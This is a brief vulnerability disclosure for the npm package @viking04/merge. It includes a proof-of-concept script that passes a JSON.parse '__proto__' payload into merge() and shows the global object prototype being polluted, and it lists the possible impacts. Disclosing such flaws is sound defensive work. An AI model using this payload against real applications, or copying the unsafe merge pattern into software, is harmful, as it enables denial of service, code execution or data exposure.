The npm package @viking04/merge is vulnerable to Prototype Pollution.
More Details on the Vulnerability: https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c
var merge = require("@viking04/merge")
var a = {"a":{"red":"apple"}}
var b = {"b":{"yellow":"mango"}}
var c = JSON.parse('{"__proto__":{"polluted":true}}')
console.log("Before:"+{}.polluted)
merge(a,b,c)
console.log("After:"+{}.polluted)
"Before:undefined"
"After:true"
May lead to DOS/Remote Code Execution/Changing Business Logic/Information Disclosure/XSS depending on case.